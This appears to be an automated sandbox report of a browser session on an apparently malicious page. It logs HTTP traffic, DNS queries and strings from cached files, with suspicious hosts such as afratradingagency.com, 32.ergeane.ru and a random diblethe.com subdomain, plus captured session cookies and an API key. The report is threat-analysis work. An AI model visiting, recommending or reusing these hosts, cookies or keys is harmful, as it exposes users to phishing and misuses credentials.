__cf_bm=wRUGrbxA9AELHJ4cTHJwKs4j1qXDKqJa1Pgjf09YU_Q-1734550104-1.0.1.1-J._13cXHYuAzy2kXPPb_rXhS7H6AcyQW3fmllIWPH6oBk86aYFdnOvFEpgqvu37EVIMs8HpC2n2mSJyz1uCTRARange: bytes=104981-106289If-Range: "428183bfb7c31d8c3bcc985dac004681"
    Source: global trafficHTTP traffic detected: GET /5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webp HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=wRUGrbxA9AELHJ4cTHJwKs4j1qXDKqJa1Pgjf09YU_Q-1734550104-1.0.1.1-J._13cXHYuAzy2kXPPb_rXhS7H6AcyQW3fmllIWPH6oBk86aYFdnOvFEpgqvu37EVIMs8HpC2n2mSJyz1uCTRA
    Source: global trafficHTTP traffic detected: GET /generate_204 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=cW9cnGXTgQtIiZ7z-ENJ5DVTszKtaNs5d4mHofa4p-JvtK7Xpo_ZZO8vJSpTycO0rKkRsnajljxdf2c0JfuG_uqbRqXxTHnbHLXksz6GLH-p0EKZAGg9jwHPkRfp29YQfrxPHB40nV4Lb-Z5d3mg8STPfLFvxZAWY9AxijTcPROCDg8e8YKVmDtGGq6IsRi_5ePEp8ARCOQFTlIYyoubHF0MJ0pRxuMvVbhFJZgwHeL_APYIN6IO_AjG7fV-EbgykSiD
    Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=cW9cnGXTgQtIiZ7z-ENJ5DVTszKtaNs5d4mHofa4p-JvtK7Xpo_ZZO8vJSpTycO0rKkRsnajljxdf2c0JfuG_uqbRqXxTHnbHLXksz6GLH-p0EKZAGg9jwHPkRfp29YQfrxPHB40nV4Lb-Z5d3mg8STPfLFvxZAWY9AxijTcPROCDg8e8YKVmDtGGq6IsRi_5ePEp8ARCOQFTlIYyoubHF0MJ0pRxuMvVbhFJZgwHeL_APYIN6IO_AjG7fV-EbgykSiD
    Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_1 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=cW9cnGXTgQtIiZ7z-ENJ5DVTszKtaNs5d4mHofa4p-JvtK7Xpo_ZZO8vJSpTycO0rKkRsnajljxdf2c0JfuG_uqbRqXxTHnbHLXksz6GLH-p0EKZAGg9jwHPkRfp29YQfrxPHB40nV4Lb-Z5d3mg8STPfLFvxZAWY9AxijTcPROCDg8e8YKVmDtGGq6IsRi_5ePEp8ARCOQFTlIYyoubHF0MJ0pRxuMvVbhFJZgwHeL_APYIN6IO_AjG7fV-EbgykSiD
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: ;function Br(){this.part="snippet,id,contentDetails,louserzations,statistics";this.Lk=new Xq({serverUrl:"https://www.googleapis.com/youtube/v3",serviceName:"youtubeDataApi"})} equals www.youtube.com (Youtube)
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: ;var Qga=Ha(["//www.youtube.com/player_api"]),Rga=Ln(Qga),Cr=[],Sga=!1;function Dr(){if(!Sga){window.onYouTubeIframeAPIReady=Tga;var a=Zo("SCRIPT");tn(a,Rga);document.head.appendChild(a);Sga=!0}} equals www.youtube.com (Youtube)
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: ;var Ssa=Ha(["//www.youtube.com/player_api"]),uB=4/3,Tsa=16/9,vB={autoplay:1,cc_load_policy:1,controls:2,hl:"en",rel:0,playsinline:0};function wB(a){var b=a.Hb;var c=a.Xl===void 0?!1:a.Xl;a=a.playerVars===void 0?vB:a.playerVars;A.call(this,"sc.tailwind.shared.video.VideoPlayer");this.o=!1;this.ma=0;this.Hb=b;this.Xl=c;this.id=this.Hb.getId();this.playerVars=a;b=this.Hb.mediumThumbnail.width;c=this.Hb.mediumThumbnail.height;this.aspectRatio=b&&c?b/c===uB?uB:Tsa:uB;this.watch(this.Hb)} equals www.youtube.com (Youtube)
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: Cf=y(["https://sandbox.google.com/tools/feedback/"]),Df=y(["https://www.google.cn/tools/feedback/"]),Ef=y(["https://help.youtube.com/tools/feedback/"]),Ff=y(["https://asx-frontend-staging.corp.google.com/inapp/"]),Gf=y(["https://asx-frontend-staging.corp.google.com/tools/feedback/"]),Hf=y(["https://localhost.corp.google.com/inapp/"]),If=y(["https://localhost.proxy.googlers.com/inapp/"]),Jf=U(lf),Kf=[U(mf),U(nf)],Lf=[U(of),U(pf),U(qf),U(rf),U(sf),U(tf),U(uf),U(vf),U(wf),U(xf)],Mf=[U(yf),U(zf)],Nf= equals www.youtube.com (Youtube)
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: Va=Va.split("-")[0].toLowerCase();if(Qa===Va||e.louserzations&&e.louserzations[a.ua])a.ma=!0;e="https://www.youtube.com/embed/"+encodeURIComponent(a.id);a.embedUrl=e}a.state=2;a.Ea(0);Bo("youtube_video_model/load/success");return Ra(c,0)}Sa(c);a.state=3;a.Ea(0);Bo("youtube_video_model/load/failure");Oa(c)})} equals www.youtube.com (Youtube)
    Source: chromecache_137.1.drString found in binary or memory: _.wq(p)+"/familylink/privacy/notice/embedded?langCountry="+_.wq(p);break;case "PuZJUb":a+="https://www.youtube.com/t/terms?chromeless=1&hl="+_.wq(m);break;case "fxTQxb":a+="https://youtube.com/t/terms?gl="+_.wq(_.Fq(c))+"&hl="+_.wq(d)+"&override_hl=1"+(f?"&linkless=1":"");break;case "prAmvd":a+="https://www.google.com/intl/"+_.wq(m)+"/chromebook/termsofservice.html?languageCode="+_.wq(d)+"&regionCode="+_.wq(c);break;case "NfnTze":a+="https://policies.google.com/privacy/google-partners"+(f?"/embedded": equals www.youtube.com (Youtube)
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: b.open("GET","https://www.googleapis.com/youtube/v3/videos?part=snippet%2C+id&key=AIzaSyD-4tE5aKFZYIS_IrfpCDRsgQZbv5VCJZM&id="+a.ma);b.send()} equals www.youtube.com (Youtube)
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: function AB(a){if(io())z().rs==2?window.YT&&window.YT.Player?CB(a,a.o):(Cr.push(function(f){CB(this,f)}.bind(a,a.o)),Dr()):po("//www.youtube.com/embed/"+a.ma+"/?rel=0&cc_load_policy=1&autoplay=1&hl="+window.sc_pageModel.lang); equals www.youtube.com (Youtube)
    Source: chromecache_166.1.dr, chromecache_140.1.dr, chromecache_139.1.drString found in binary or memory: return b}VD.F="internal.enableAutoEventOnTimer";var Vb=wa(["data-gtm-yt-inspected-"]),XD=["www.youtube.com","www.youtube-nocookie.com"],YD,ZD=!1; equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: 52kz793.afratradingagency.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: 32.ergeane.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdn.prod.website-files.com
    Source: global trafficDNS traffic detected: DNS query: 5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com
    Source: global trafficDNS traffic detected: DNS query: docs.google.com
    Source: global trafficDNS traffic detected: DNS query: accounts.youtube.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: global trafficDNS traffic detected: DNS query: support.google.com
    Source: global trafficDNS traffic detected: DNS query: lh3.googleusercontent.com
    Source: global trafficDNS traffic detected: DNS query: apis.google.com
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/2086485229:1734549043:TPqdoFXSqnBTzlfdVp_C1hOSpTqfObAmvJDumlRiigI/8f418d689add32ca/sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3241sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qusec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 19:27:52 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 30 Sep 2022 11:49:49 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 19:27:55 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: o7nDe2/MLcayTFcolB0Xb7m9PoxSA/jfneU=$pYLi/upbVV0MU0c+cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f418d91ae0b8c8f-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 19:28:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: kBiTr8yXtKXIGjiZXwpXl9pIK5D/P7w17EI=$DSmCvG44mHmr9VynServer: cloudflareCF-RAY: 8f418db9a8bcf5fa-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 19:28:11 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: HM/882zN0fx7jMdftnW3VaCVPigSZXmbVuo=$m0crXMMGMyq5LbqaServer: cloudflareCF-RAY: 8f418df5ae748c89-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 19:28:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6A0V5eJHrcabc1RHlQm3W1GJ8RrJJlBC6i0oCJwyMEtdVqAHIVSL%2FSxVwAovMVg95dSgMqzWiz%2FnFP%2FfxqizR%2FDTfMeqN%2FG0geMLltpd6Yh77BM%2Bce3TJh%2Fqj%2FYRA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1337&min_rtt=1201&rtt_var=92&sent=1129&recv=320&lost=0&retrans=0&sent_bytes=1327579&recv_bytes=50371&delivery_rate=53683791&cwnd=335&unsent_bytes=0&cid=901b9ac1cfb4cdef&ts=602373&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 8f418e19b9b9efa3-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2108&min_rtt=2100&rtt_var=805&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1892&delivery_rate=1345002&cwnd=114&unsent_bytes=0&cid=b2eb2b4ca8b49466&ts=4634&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 19:28:55 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: LT+1e6yO4bumyIjWsDEuK1DrFNvDrdUnHBk=$lSgpbkhXq8ba+bl7Server: cloudflareCF-RAY: 8f418f0a98e00f71-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 19:29:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: NzI30uBfstlpkOjtfDiEgZwAaPYaJI6DtNg=$ofTfJ1JuuIQO1lBnServer: cloudflareCF-RAY: 8f418f3269e0c329-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 19:29:07 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: iWMeS0Murjp4frzFQRfxAObRLPs1B5PqXK8=$gsqnrhiM8gNk3m99Server: cloudflareCF-RAY: 8f418f52cee26a55-EWRalt-svc: h3=":443"; ma=86400
    Source: chromecache_164.1.drString found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
    Source: chromecache_164.1.drString found in binary or memory: http://gmpg.org/xfn/11
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: http://localhost.corp.google.com/inapp/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: http://localhost.proxy.googlers.com/inapp/
    Source: chromecache_146.1.dr, chromecache_128.1.drString found in binary or memory: http://www.broofa.com
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: http://www.google.com/support/websearch/bin/answer.py?hl=
    Source: chromecache_170.1.dr, chromecache_119.1.drString found in binary or memory: https://32.ergeane.ru/yNriUGk0/
    Source: chromecache_137.1.drString found in binary or memory: https://accounts.google.com
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://accounts.google.com/
    Source: chromecache_137.1.drString found in binary or memory: https://accounts.google.com/TOS?loc=
    Source: chromecache_139.1.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
    Source: chromecache_127.1.dr, chromecache_116.1.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
    Source: chromecache_146.1.dr, chromecache_128.1.drString found in binary or memory: https://apis.google.com
    Source: chromecache_138.1.dr, chromecache_107.1.drString found in binary or memory: https://apis.google.com/js/api.js
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://apis.google.com/js/client.js
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://apis.google.com/js/rpc:shindig_random.js?onload=credentialservice.postMessage
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://asx-frontend-autopush.corp.google.co.uk/inapp/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://asx-frontend-autopush.corp.google.co.uk/tools/feedback/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://asx-frontend-autopush.corp.google.com/inapp/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://asx-frontend-autopush.corp.google.com/tools/feedback/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://asx-frontend-autopush.corp.google.de/inapp/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://asx-frontend-autopush.corp.google.de/tools/feedback/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://asx-frontend-autopush.corp.youtube.com/inapp/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://asx-frontend-autopush.corp.youtube.com/tools/feedback/
    Source: chromecache_145.1.drString found in binary or memory: https://asx-frontend-staging.corp.google.com/inapp/
    Source: chromecache_145.1.drString found in binary or memory: https://asx-frontend-staging.corp.google.com/tools/feedback/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://asx-help-frontend-autopush.corp.youtube.com/inapp/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://asx-help-frontend-autopush.corp.youtube.com/tools/feedback/
    Source: chromecache_166.1.dr, chromecache_140.1.dr, chromecache_139.1.drString found in binary or memory: https://cct.google/taggy/agent.js
    Source: chromecache_125.1.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://clients6.google.com
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://content-googleapis-staging.sandbox.google.com
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://content-googleapis-test.sandbox.google.com
    Source: chromecache_137.1.drString found in binary or memory: https://families.google.com/intl/
    Source: chromecache_145.1.drString found in binary or memory: https://feedback-pa.clients6.google.com
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://feedback.googleusercontent.com/resources/annotator.css
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://feedback.googleusercontent.com/resources/render_frame2.html
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://feedback2-test.corp.google.com/inapp/%
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://feedback2-test.corp.google.com/tools/feedback/%
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://feedback2-test.corp.googleusercontent.com/inapp/%
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://feedback2-test.corp.googleusercontent.com/tools/feedback/%
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.google.com/license/googlerestricted
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmZjtiu7.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmdjtiu7.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmhjtg.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmtjtiu7.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmxjtiu7.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmZjtiu7.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmdjtiu7.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmhjtg.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmtjtiu7.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmxjtiu7.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qE52i1dC.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qER2i1dC.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEV2i1dC.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEl2i1dC.woff2)
    Source: chromecache_134.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEp2iw.woff2)
    Source: chromecache_146.1.dr, chromecache_128.1.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
    Source: chromecache_146.1.dr, chromecache_128.1.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
    Source: chromecache_146.1.dr, chromecache_128.1.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
    Source: chromecache_146.1.dr, chromecache_128.1.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
    Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/drive_2020q4/v10/192px.svg
    Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/gmail_2020q4/v10/web-48dp/logo_gmail_2020q4_color_2x_web_
    Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/maps/v7/192px.svg
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.0.wo
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.1.wo
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.10.w
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.11.w
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.2.wo
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.3.wo
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.4.wo
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.5.wo
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.6.wo
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.7.wo
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.8.wo
    Source: chromecache_148.1.drString found in binary or memory: https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.9.wo
    Source: 7ec8386f-975e-43a6-9bc2-903b5c13f760.tmp.0.drString found in binary or memory: https://fonts.gstatic.com/s/robo
    Source: 7ec8386f-975e-43a6-9bc2-903b5c13f760.tmp.0.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)format(
    Source: 7ec8386f-975e-43a6-9bc2-903b5c13f760.tmp.0.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2)format(
    Source: 7ec8386f-975e-43a6-9bc2-903b5c13f760.tmp.0.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)format(
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://g.co/recover
    Source: chromecache_145.1.drString found in binary or memory: https://gstatic.com/uservoice/surveys/resources/
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://guidebooks.google.com
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://help.youtube.com/tools/feedback/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://localhost.corp.google.com/inapp/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://localhost.proxy.googlers.com/inapp/
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://myaccount.google.com/privacypolicy?hl=
    Source: chromecache_139.1.drString found in binary or memory: https://pagead2.googlesyndication.com
    Source: chromecache_166.1.dr, chromecache_140.1.dr, chromecache_139.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://play.google.com
    Source: chromecache_137.1.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://play.google.com/work/enroll?identifier=
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://play.google/intl/
    Source: chromecache_137.1.drString found in binary or memory: https://policies.google.com/privacy
    Source: chromecache_137.1.drString found in binary or memory: https://policies.google.com/privacy/additional
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://policies.google.com/privacy/google-partners
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://policies.google.com/technologies/cookies
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://policies.google.com/technologies/location-data
    Source: chromecache_104.1.dr, 6130773.htm.crdownload.0.dr, chromecache_137.1.drString found in binary or memory: https://policies.google.com/terms
